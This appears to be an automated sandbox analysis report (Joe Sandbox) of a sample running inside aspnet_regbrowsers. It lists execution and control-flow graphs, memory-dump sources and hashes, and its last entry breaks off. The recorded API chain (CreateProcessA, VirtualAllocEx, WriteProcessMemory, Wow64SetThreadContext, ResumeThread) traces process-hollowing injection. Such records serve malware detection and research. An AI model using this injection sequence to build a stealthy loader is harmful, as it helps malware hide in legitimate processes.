                                                                                                                                                                                        execution_graph 10475 25ebd2 10478 7d0b20 10475->10478 10479 7d0b35 10478->10479 10482 7d0b51 10479->10482 10483 7d0b7a 10482->10483 10499 7d0fa6 10483->10499 10505 7d1086 10483->10505 10510 7d15b3 10483->10510 10516 7d1053 10483->10516 10521 7d1950 10483->10521 10526 7d14d1 10483->10526 10531 7d0ff5 10483->10531 10536 7d101a 10483->10536 10541 7d10bb 10483->10541 10546 7d13de 10483->10546 10550 7d127c 10483->10550 10554 7d10fd 10483->10554 10557 7d1343 10483->10557 10562 7d1381 10483->10562 10484 25ebe6 10566 25e270 10499->10566 10506 7d10b4 10505->10506 10570 25db90 10506->10570 10574 25db89 10506->10574 10507 7d1471 10586 25ded8 10510->10586 10511 7d1001 10511->10484 10512 7d1013 10511->10512 10578 25e030 10511->10578 10582 25e038 10511->10582 10512->10484 10517 7d105c 10516->10517 10519 25db90 ResumeThread 10517->10519 10520 25db89 ResumeThread 10517->10520 10518 7d1471 10519->10518 10520->10518 10522 7d1001 10521->10522 10523 7d1013 10522->10523 10524 25e030 ReadProcessMemory 10522->10524 10525 25e038 ReadProcessMemory 10522->10525 10523->10484 10524->10522 10525->10522 10527 7d14d7 10526->10527 10529 25db90 ResumeThread 10527->10529 10530 25db89 ResumeThread 10527->10530 10528 7d1471 10529->10528 10530->10528 10532 7d1001 10531->10532 10533 7d1013 10532->10533 10534 25e030 ReadProcessMemory 10532->10534 10535 25e038 ReadProcessMemory 10532->10535 10533->10484 10534->10532 10535->10532 10537 7d1034 10536->10537 10538 7d12d3 10537->10538 10539 25db90 ResumeThread 10537->10539 10540 25db89 ResumeThread 10537->10540 10538->10484 10538->10538 10539->10538 10540->10538 10544 25e030 ReadProcessMemory 10541->10544 10545 25e038 ReadProcessMemory 10541->10545 10542 7d1001 10542->10541 10543 7d1013 10542->10543 10543->10484 10544->10542 10545->10542 10590 25dc80 10546->10590 10594 25dc79 10546->10594 10547 7d13f8 10598 25ddb0 10550->10598 10602 25dda8 10550->10602 10551 7d129e 10556 25ded8 WriteProcessMemory 10554->10556 10555 7d112b 10555->10484 10556->10555 10558 7d1001 10557->10558 10559 7d1013 10558->10559 10560 25e030 ReadProcessMemory 10558->10560 10561 25e038 ReadProcessMemory 10558->10561 10559->10484 10560->10558 10561->10558 10563 7d138e 10562->10563 10565 25ded8 WriteProcessMemory 10563->10565 10564 7d166b 10564->10484 10565->10564 10567 25e2f7 CreateProcessA 10566->10567 10569 25e555 10567->10569 10569->10569 10571 25dbd4 ResumeThread 10570->10571 10573 25dc26 10571->10573 10573->10507 10575 25dbd4 ResumeThread 10574->10575 10577 25dc26 10575->10577 10577->10507 10579 25e038 ReadProcessMemory 10578->10579 10581 25e102 10579->10581 10581->10511 10583 25e084 ReadProcessMemory 10582->10583 10585 25e102 10583->10585 10585->10511 10587 25df24 WriteProcessMemory 10586->10587 10589 25dfc3 10587->10589 10589->10511 10591 25dcc9 Wow64SetThreadContext 10590->10591 10593 25dd47 10591->10593 10593->10547 10595 25dcc9 Wow64SetThreadContext 10594->10595 10597 25dd47 10595->10597 10597->10547 10599 25ddf4 VirtualAllocEx 10598->10599 10601 25de72 10599->10601 10601->10551 10603 25ddb0 VirtualAllocEx 10602->10603 10605 25de72 10603->10605 10605->10551

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: &&
                                                                                                                                                                                        • API String ID: 0-1342837798
                                                                                                                                                                                        • Opcode ID: 9c0567731e111acde72fad84d2e00d7ac0a43a8aa7ca3eafe6d6d3a731f2fe45
                                                                                                                                                                                        • Instruction ID: 86492e27474b6520099c8604dd2c4e4c1249aec75cfd768007aced07c81b1b47
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c0567731e111acde72fad84d2e00d7ac0a43a8aa7ca3eafe6d6d3a731f2fe45
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1682E434A20219CFDB14DB64C894FD9B7B2BF8A305F1185E9E8096B361DB30AE95CF54
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 2fd2f0090272da7e4f2e6b2c8849e624e52c2f477a4b015c85e328d6daee1d3d
                                                                                                                                                                                        • Instruction ID: 4ab649dbe59991750b439edd886c0e1f22b4e43d1b1d73b339140a7044e2ea2a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd2f0090272da7e4f2e6b2c8849e624e52c2f477a4b015c85e328d6daee1d3d
                                                                                                                                                                                        • Instruction Fuzzy Hash: AD82D434A20219CFDB14DB64C894FD9B7B2BF8A305F1185E9E8096B361DB30AE95CF54
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: b43e1d8c52ed55df3c9a6af27934a5d3540ddf1fde32bb5d16c93f345c405795
                                                                                                                                                                                        • Instruction ID: cd31493c24b0cae9ad9d44a70926e4b76f29080d4b06c19c7a6919f0e79940f5
                                                                                                                                                                                        • Opcode Fuzzy Hash: b43e1d8c52ed55df3c9a6af27934a5d3540ddf1fde32bb5d16c93f345c405795
                                                                                                                                                                                        • Instruction Fuzzy Hash: F8E14731E24605CBDB04AFA4C8917BEFBB1EF8530AF148127E851EB281D734D9A6C759
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 7d9435e220565441e38e5becd679c905865126f2999bc2c5baa2d896050229d3
                                                                                                                                                                                        • Instruction ID: 4377e5b2a13defd344707c7a23a545d0f789c389fc51da550a11d49206e902e8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d9435e220565441e38e5becd679c905865126f2999bc2c5baa2d896050229d3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D713670D6C2448FDB05CF65E8442ADBFB1AF86306F18C4ABD855DB292D3748958CB1A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f31299d0e57f08dbe2fe07e5a1399d3c25450de59b9344b360f81c4b318b55d0
                                                                                                                                                                                        • Instruction ID: 207cfc0f846a52fc4fec46ff430bf1ca1613f25995630d69579955b38e7fa231
                                                                                                                                                                                        • Opcode Fuzzy Hash: f31299d0e57f08dbe2fe07e5a1399d3c25450de59b9344b360f81c4b318b55d0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F3129B0D14608CBEB08CFA7C8543EEBBF6AFC9300F14C06AC40966265DB740A8A8F54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 204 25e270-25e309 206 25e352-25e37a 204->206 207 25e30b-25e322 204->207 210 25e3c0-25e416 206->210 211 25e37c-25e390 206->211 207->206 212 25e324-25e329 207->212 221 25e45c-25e553 CreateProcessA 210->221 222 25e418-25e42c 210->222 211->210 219 25e392-25e397 211->219 213 25e34c-25e34f 212->213 214 25e32b-25e335 212->214 213->206 216 25e337 214->216 217 25e339-25e348 214->217 216->217 217->217 220 25e34a 217->220 223 25e399-25e3a3 219->223 224 25e3ba-25e3bd 219->224 220->213 240 25e555-25e55b 221->240 241 25e55c-25e641 221->241 222->221 229 25e42e-25e433 222->229 225 25e3a5 223->225 226 25e3a7-25e3b6 223->226 224->210 225->226 226->226 230 25e3b8 226->230 231 25e435-25e43f 229->231 232 25e456-25e459 229->232 230->224 234 25e441 231->234 235 25e443-25e452 231->235 232->221 234->235 235->235 236 25e454 235->236 236->232 240->241 253 25e651-25e655 241->253 254 25e643-25e647 241->254 256 25e665-25e669 253->256 257 25e657-25e65b 253->257 254->253 255 25e649 254->255 255->253 258 25e679-25e67d 256->258 259 25e66b-25e66f 256->259 257->256 260 25e65d 257->260 262 25e6b3-25e6be 258->262 263 25e67f-25e6a8 258->263 259->258 261 25e671 259->261 260->256 261->258 267 25e6bf 262->267 263->262 267->267
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025E537
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                        • Opcode ID: fd10a6692f5ad0806b92c045a7379e084c0db61f83d2cd7550dfc71ef3fb59d2
                                                                                                                                                                                        • Instruction ID: a066526efd0eb9e6788cbd0921ccf84051db5b1899c4f2751b3a34795c073221
                                                                                                                                                                                        • Opcode Fuzzy Hash: fd10a6692f5ad0806b92c045a7379e084c0db61f83d2cd7550dfc71ef3fb59d2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 99C12670D102299FDF24CFA4C845BEDBBB1BF49300F0491AAD819B7280DB749A99CF95

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 268 25ded8-25df43 270 25df45-25df57 268->270 271 25df5a-25dfc1 WriteProcessMemory 268->271 270->271 273 25dfc3-25dfc9 271->273 274 25dfca-25e01c 271->274 273->274
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025DFAB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                        • Opcode ID: 1cd56eceac4e799cde2adfcd3126a8cd2ec77e92c8a56c9e34b09f6e56c46645
                                                                                                                                                                                        • Instruction ID: be4f67fe999466c001342e6b8b5086bf6e585abf728b6782b2ccec42f24a41f9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cd56eceac4e799cde2adfcd3126a8cd2ec77e92c8a56c9e34b09f6e56c46645
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0841A9B4D002499FCF10CFA9D984AEEFBF1BB49310F20902AE819B7250D375AA55CF64

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 279 25e030-25e100 ReadProcessMemory 283 25e102-25e108 279->283 284 25e109-25e15b 279->284 283->284
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E0EA
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                        • Opcode ID: 69ab71a9d348a4bff4fda70b89906a043689e827a70ab737f92cb45681520ee6
                                                                                                                                                                                        • Instruction ID: 9e7133afbdad080a52390b85eec33ee8e5ad3bd31749ed6b8322e1cbc2430fe7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 69ab71a9d348a4bff4fda70b89906a043689e827a70ab737f92cb45681520ee6
                                                                                                                                                                                        • Instruction Fuzzy Hash: CE41A9B5D002589FCF04CFA9D884AEEFBB1BF49310F20902AE815B7250D775AA55CF68

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 289 25e038-25e100 ReadProcessMemory 292 25e102-25e108 289->292 293 25e109-25e15b 289->293 292->293
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E0EA
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                        • Opcode ID: 200e3eee4375053a7d3271e4d54a198bd09bfec9fb27162bac34a1c6bd159d72
                                                                                                                                                                                        • Instruction ID: 074ab7c5e2651512f07d5925f6f1f2817a9fbd5b01b8f84fd641a83369ef59c5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 200e3eee4375053a7d3271e4d54a198bd09bfec9fb27162bac34a1c6bd159d72
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8541AAB5D002589FCF00CFA9D884AEEFBB1BF49310F20902AE815B7240D775AA55CF68

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 298 25dda8-25de70 VirtualAllocEx 302 25de72-25de78 298->302 303 25de79-25dec3 298->303 302->303
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025DE5A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                        • Opcode ID: 7b116b76bdbbf7a0ae05ab9cac84446209a8af5f3f006c0b4ef850e1344925b7
                                                                                                                                                                                        • Instruction ID: 4b12f8698de4fb4da6ae92e30f4c903a4f413ce7cd0d9ce5143288e3bfab05fd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b116b76bdbbf7a0ae05ab9cac84446209a8af5f3f006c0b4ef850e1344925b7
                                                                                                                                                                                        • Instruction Fuzzy Hash: E941B9B4D002489FCF10CFA9D880AEEFBB1BF59310F20941AE814BB210C735A915CFA4

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 308 25ddb0-25de70 VirtualAllocEx 311 25de72-25de78 308->311 312 25de79-25dec3 308->312 311->312
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025DE5A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                        • Opcode ID: 32bec248c5216c39cd02a2573328d20459918990b8ec585768bc175b7a56aa05
                                                                                                                                                                                        • Instruction ID: a5be2e6bccac7afbeb7609e9a58e69dfa5423d57d9e8c91d79d75739a2d17a8a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 32bec248c5216c39cd02a2573328d20459918990b8ec585768bc175b7a56aa05
                                                                                                                                                                                        • Instruction Fuzzy Hash: FE41AAB4D002489FCF10CFA9D884AEEFBB1BF59310F20901AE814BB210D735A915CF94

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 317 25dc79-25dce0 319 25dcf7-25dd45 Wow64SetThreadContext 317->319 320 25dce2-25dcf4 317->320 322 25dd47-25dd4d 319->322 323 25dd4e-25dd9a 319->323 320->319 322->323
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025DD2F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: d1826b591bf5b8b855310822801d4a7a3e0c81b22caf79c06f4a33f6cf2bced4
                                                                                                                                                                                        • Instruction ID: e44ee3464bb390cb39d1387fa2e5bce9879bd7926e399f07db6fcdd1498949f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: d1826b591bf5b8b855310822801d4a7a3e0c81b22caf79c06f4a33f6cf2bced4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E41DFB5D012499FCB10CFA9D984AEEFBB1BF49314F24802AE818B7240D775AA49CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 328 25dc80-25dce0 330 25dcf7-25dd45 Wow64SetThreadContext 328->330 331 25dce2-25dcf4 328->331 333 25dd47-25dd4d 330->333 334 25dd4e-25dd9a 330->334 331->330 333->334
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025DD2F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: 9697cc81f2edfa3019f20c702e3b461031ff2770784b2153e0353dc5a76608b7
                                                                                                                                                                                        • Instruction ID: 9d2f8c0b19365580451c9412e146d0c93d61237639ff2c9abb50527624213860
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9697cc81f2edfa3019f20c702e3b461031ff2770784b2153e0353dc5a76608b7
                                                                                                                                                                                        • Instruction Fuzzy Hash: AE41DEB5D012489FCB10CFA9D884AEEFBB1BF48310F24802AE814B7240C778AA49CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 339 25db89-25dc24 ResumeThread 342 25dc26-25dc2c 339->342 343 25dc2d-25dc6f 339->343 342->343
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 0025DC0E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                        • Opcode ID: 5b193b26148c845fb5c464d0496054059b328b65dca6a343bd07d4745e724c8c
                                                                                                                                                                                        • Instruction ID: 06c2e2c6a0d22fdf19a5c0c81cbd328827cda4550611bf2613c2a32dbf1c2ad7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b193b26148c845fb5c464d0496054059b328b65dca6a343bd07d4745e724c8c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0831CAB4D002189FCF10CFA9D984AEEFBB0AF89314F24941AE818B7300C775AA05CF94

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 348 25db90-25dc24 ResumeThread 351 25dc26-25dc2c 348->351 352 25dc2d-25dc6f 348->352 351->352
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 0025DC0E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.486065891.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_250000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                        • Opcode ID: 90b60685f4b54d1a1ececcd4cf2872360c9689160c64a1eb65ad72cc8c9c1152
                                                                                                                                                                                        • Instruction ID: 082c24b0ab551313433566e41680f17399c048f8962e79471e303dd82d7b56c0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 90b60685f4b54d1a1ececcd4cf2872360c9689160c64a1eb65ad72cc8c9c1152
                                                                                                                                                                                        • Instruction Fuzzy Hash: A331BBB4D102189FCF10CFA9D984AEEFBB5AF89310F24941AE815B7300C775A945CF98

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 412 7d10fd-7d1129 call 25ded8 413 7d112b-7d1752 412->413 415 7d1758-7d1759 413->415 416 7d18a5-7d18ab 413->416 415->416
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                                                        • Opcode ID: deb6b499189c98d1fa7192f99667336353b69f107600b5fe4abdb9dae6608985
                                                                                                                                                                                        • Instruction ID: 3266db72e218d932e25fd2df7d71563a89bd0fba5e9c6862c40cdaf845261880
                                                                                                                                                                                        • Opcode Fuzzy Hash: deb6b499189c98d1fa7192f99667336353b69f107600b5fe4abdb9dae6608985
                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F0E275906228DFEB20CF54C944BE9B7B5FB09314F2481DAD408A3251C3369EC5DF40
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.485819539.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_1bd000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 92e3d1ea4c0a63196b11ce9f6e1a86b44eefeaa33d4192eaffd83fb37e4c88d7
                                                                                                                                                                                        • Instruction ID: 6c0445861dc9a7fc7cc9773b09e35707e1bde96eac9c2eef3a29a0387a5cb01e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 92e3d1ea4c0a63196b11ce9f6e1a86b44eefeaa33d4192eaffd83fb37e4c88d7
                                                                                                                                                                                        • Instruction Fuzzy Hash: AD210372604240EFDB19DF10E8C0B66BF75EBC8318F20C569E8050B246D336D956DBA1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.487007637.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7d0000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 893cce45023f614df31a2a7b0a1ff298c050b9aac82d04ffb89c1373cbe21ce6
                                                                                                                                                                                        • Instruction ID: 9f6fcbe0c0b15ccd72b3ee5ccda88835e6668b414147da3d6777ef0e69cdcb34
                                                                                                                                                                                        • Opcode Fuzzy Hash: 893cce45023f614df31a2a7b0a1ff298c050b9aac82d04ffb89c1373cbe21ce6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D31E278909228DFDB60CF64C884BECB7B4AB09305F6491EAD409A7352D7389EC4DF54
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.485968434.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_1cd000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 290593f019a1eb9d6247a44e8b42b2302395521945e671005ae69ad9d039b06d
                                                                                                                                                                                        • Instruction ID: 15099a54229a1c5f5e0bddc7990143833a6fd35fb2bd191057ad747f1ed4ac5d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 290593f019a1eb9d6247a44e8b42b2302395521945e671005ae69ad9d039b06d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C21AF75604240EFDB14CF18E884F16BBA5EB94714F24C5BDE84A4B246C33AD867CAA2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000011.00000002.485968434.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_1cd000_aspnet_regbrowsers.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 29eb6be1a5907764834c011fb794419dc2f5c7b09461b4e8702059846b452196
                                                                                                                                                                                        • Instruction ID: fe337a4d8a360d47448b7e1091fdaff4731c16c2bbc7c9f468701d5f00b64f29
